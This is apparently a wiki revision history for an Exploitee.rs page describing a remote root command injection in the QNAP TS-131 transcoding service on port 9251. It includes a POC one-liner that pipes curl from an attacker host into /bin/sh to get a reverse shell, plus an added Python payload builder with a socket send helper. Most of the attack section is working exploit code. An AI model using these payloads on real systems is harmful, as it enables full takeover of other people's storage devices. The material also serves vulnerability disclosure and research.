https://www.Exploitee.rs/index.php?title=QNAP_TS-131&feed=atom&action=historyQNAP TS-131 - Revision history2024-03-29T14:34:19ZRevision history for this page on the wikiMediaWiki 1.37.2https://www.Exploitee.rs/index.php?title=QNAP_TS-131&diff=2886&oldid=prevZenofex at 12:30, 10 August 20172017-08-10T12:30:24Z<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 12:30, 10 August 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l64">Line 64:</td>
<td colspan="2" class="diff-lineno">Line 64:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>printf "\x01\x00\x00\x00/|curl\t-s\t-k\thttp://<ATTACKER_IP>/reverseshell.sh|/bin/sh|\x00" | nc <DEVICEIP> 9251</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>printf "\x01\x00\x00\x00/|curl\t-s\t-k\thttp://<ATTACKER_IP>/reverseshell.sh|/bin/sh|\x00" | nc <DEVICEIP> 9251</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">==== Demo ====</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">{{#ev:youtube|gXbFGECtZXE}}</ins></div></td></tr>
</table>Zenofexhttps://www.Exploitee.rs/index.php?title=QNAP_TS-131&diff=2803&oldid=prevZenofex: Zenofex moved page QNAP TS131 to QNAP TS-1312017-08-06T13:30:53Z<p>Zenofex moved page <a href="/index.php/QNAP_TS131" class="mw-redirect" title="QNAP TS131">QNAP TS131</a> to <a href="/index.php/QNAP_TS-131" title="QNAP TS-131">QNAP TS-131</a></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 13:30, 6 August 2017</td>
</tr>
</table>Zenofexhttps://www.Exploitee.rs/index.php?title=QNAP_TS-131&diff=2801&oldid=prevZenofex: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Network Attached Storage == About == The QNAP TurboStation is a series of network attached..."2017-08-06T13:29:56Z<p>Created page with "__FORCETOC__ {{Disclaimer}} <a href="/index.php/File:Qnap_TS131.jpg" title="File:Qnap TS131.jpg">left|100px|thumb</a> <a href="/index.php/Category:Network_Attached_Storage" title="Category:Network Attached Storage">Category:Network Attached Storage</a> == About == The QNAP TurboStation is a series of network attached..."</p>
<p><b>New page</b></p><div>__FORCETOC__<br />
<br />
{{Disclaimer}}<br />
[[File:Qnap_TS131.jpg|left|100px|thumb]]<br />
[[Category:Network Attached Storage]]<br />
<br />
== About ==<br />
The QNAP TurboStation is a series of network attached storage devices.<br />
<br />
== Purchase ==<br />
Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device.<br />
[https://www.amazon.com/TS-431P-US-4-bay-Personal-Cortex-1-7GHzDual/dp/B01N2K147Q/ref=as_li_ss_tl?ie=UTF8&qid=1502023602&sr=8-5&keywords=qnap+ts&linkCode=ll1&tag=exploiteers-20&linkId=b16ee2791963409b68466b3d0d50309f Purchase the QNAP TS-431 (4-bay version of 131) at Amazon]<br />
<br />
== Transcoding Service Remote Root==<br />
QNAP NAS devices run a service used to transcode media files. This service is vulnerable to command injection, resulting in remote command execution as root.<br />
<br />
'''This attack works on a number of QNAP models but was originally tested on a TS-131'''<br />
<br />
=== Transcoding Service RCE Analysis ===<br />
<br />
The output below shows the transcoding binary listening on TCP port 9251:<br />
<pre><br />
$ lsof -i<br />
mytransco 8645 admin 6u IPv4 26431 0t0 TCP *:9251 (LISTEN)<br />
$ netstat -aen<br />
tcp 0 0 0.0.0.0:9251 0.0.0.0:* LISTEN <br />
$ ps aux<br />
8645 admin 3816 S /usr/local/medialibrary/bin/mytranscodesvr -s -u -debug -db /share/CACHEDEV1_DATA <br />
</pre><br />
<br />
This service runs as root (the process owner is shown as "admin", which on QNAP's QTS is uid 0) and listens on port 9251. Messages are in the following format: a 4-byte command ID followed by a NUL-terminated argument.<br />
<br />
<pre><br />
0x01 0x00 0x00 0x00 /PATH/TO/FILE 0x00 <br />
[_____COMMAND ID_____] [___NULL TERMINATED ARG___]<br />
</pre><br />
<br />
The above example uses the ID (0x01) for the "rmfile" command. This command's handler contains a vulnerability which can be leveraged for remote code execution. The Hex-Rays output of the handler is shown below.<br />
<br />
[[File:QNAP_TS131_rmfile_decompile.png|575px]]<br />
<br />
In the above, for case 1, a buffer is allocated and then a call is made to the "removeFileFromDatabase" method. The Hex-Rays output of that method is shown below.<br />
<br />
[[File:QNAP TS131 StringConvert2SystemCmdFilename decompile.png|550px]]<br />
<br />
"removeFileFromDatabase" then attempts to sanitize the user-supplied path with a function called "StringConvert2SystemCmdFilename". That function filters "0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %" but does not filter pipes, backslashes, or tabs. Because the sanitized string ends up in a system command, pipes give us command injection, and tabs (\t) stand in for the filtered spaces as the field separator between arguments.<br />
<br />
====Vulnerability Summary====<br />
* Transcoding service runs on multiple QNAP NAS models<br />
** Listens on TCP port 9251<br />
** Service runs as root<br />
** Accepts commands to transcode files<br />
** Command "rmfile" (ID 0x01) is vulnerable to command injection<br />
** Sanitization routine filters most unsafe characters<br />
*** Except the vertical pipe!<br />
*** Spaces (0x20) are filtered<br />
**** Use tabs between arguments<br />
*** Filters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %<br />
*** Doesn't filter | or \<br />
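<br />
The following Python is an added example, not code from the Exploitee.rs page: it serialises and parses the message format described above (4-byte command ID, NUL-terminated argument), models the documented "StringConvert2SystemCmdFilename" character filter so a payload can be checked before it is sent, and builds the tab-separated pipe injection shape used in the POC. The filter set is copied from the page as written (0x20 is space; 0x39 is the digit 9 if taken literally, so the check flags any 9 in the stager URL). Assumed, because the page does not say: that the sanitiser strips rather than rejects the listed characters, and that the real mytranscodesvr parser reads the argument up to the first NUL. The stager URL and the send helper are placeholders; nothing below touches the network unless you call send_message yourself.<br />
<br />
```python
import socket
import struct

# Command ID 0x01 = "rmfile", per the page's analysis.
CMD_RMFILE = 1

# Characters the page says StringConvert2SystemCmdFilename filters.
# 0x20 is space; "\x39" (the digit 9) is copied from the page as given.
# Tab (0x09), '|' and '\\' are NOT in the set, which is the whole bug.
FILTERED = frozenset(" !$&\x39,;=[]^`{}%")


def build_message(cmd_id: int, arg: str) -> bytes:
    """Serialise one message: 4-byte little-endian command ID followed by the
    NUL-terminated argument, matching the format diagram and the POC bytes
    (\\x01\\x00\\x00\\x00 ... \\x00)."""
    if "\x00" in arg:
        raise ValueError("argument is NUL-terminated on the wire; embedded NUL not allowed")
    return struct.pack("<I", cmd_id) + arg.encode() + b"\x00"


def parse_message(data: bytes):
    """Receiving side (assumed, to show the framing): read the command ID,
    then the argument up to the first NUL. Returns (cmd_id, arg)."""
    if len(data) < 5:
        raise ValueError("short message")
    (cmd_id,) = struct.unpack("<I", data[:4])
    body = data[4:]
    end = body.find(b"\x00")
    if end < 0:
        raise ValueError("argument not NUL-terminated")
    return cmd_id, body[:end].decode()


def apply_filter(arg: str) -> str:
    """Model of the documented sanitiser. Assumption: it strips the filtered
    characters; a payload containing none of them passes through unchanged."""
    return "".join(c for c in arg if c not in FILTERED)


def survives_filter(arg: str) -> bool:
    return apply_filter(arg) == arg


def injection_path(pipeline) -> str:
    """Build the POC's shape: '/' then '|cmd1|cmd2|...|', each command's words
    joined by tabs because 0x20 is filtered. pipeline is a list of argv lists,
    e.g. [["curl", "-s", "-k", url], ["/bin/sh"]]. Raises if any word would be
    mangled by the filter ('=' and '%' rule out query strings and URL-encoding)."""
    stages = ["\t".join(argv) for argv in pipeline]
    path = "/|" + "|".join(stages) + "|"
    if not survives_filter(path):
        bad = sorted({c for c in path if c in FILTERED})
        raise ValueError(f"payload contains filtered characters: {bad!r}")
    return path


def send_message(host: str, msg: bytes, port: int = 9251, timeout: float = 5.0) -> None:
    """Deliver a message to the service. Not called anywhere in this file."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(msg)


if __name__ == "__main__":
    # ATTACKER_IP is a placeholder hostname; replace it with your own host.
    payload = injection_path([["curl", "-s", "-k", "http://ATTACKER_IP/reverseshell.sh"], ["/bin/sh"]])
    msg = build_message(CMD_RMFILE, payload)
    print(msg)
    print(parse_message(msg))
```
<br />
The same payload written with spaces instead of tabs fails survives_filter, which is exactly why the POC uses \t; if your stager host contains characters from the filtered set, injection_path raises before anything is sent.<br />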
<br />
===POC===<br />
Sending a message to the transcoding server with command ID 0x01 whose argument starts and ends with a pipe and carries a tab-delimited command results in RCE as root. The one-liner below relies on bash's builtin printf understanding \xHH escapes; POSIX printf only guarantees octal escapes, so under other shells write the command ID as \001\000\000\000.<br />
<pre><br />
printf "\x01\x00\x00\x00/|curl\t-s\t-k\thttp://<ATTACKER_IP>/reverseshell.sh|/bin/sh|\x00" | nc <DEVICEIP> 9251<br />
</pre></div>Zenofex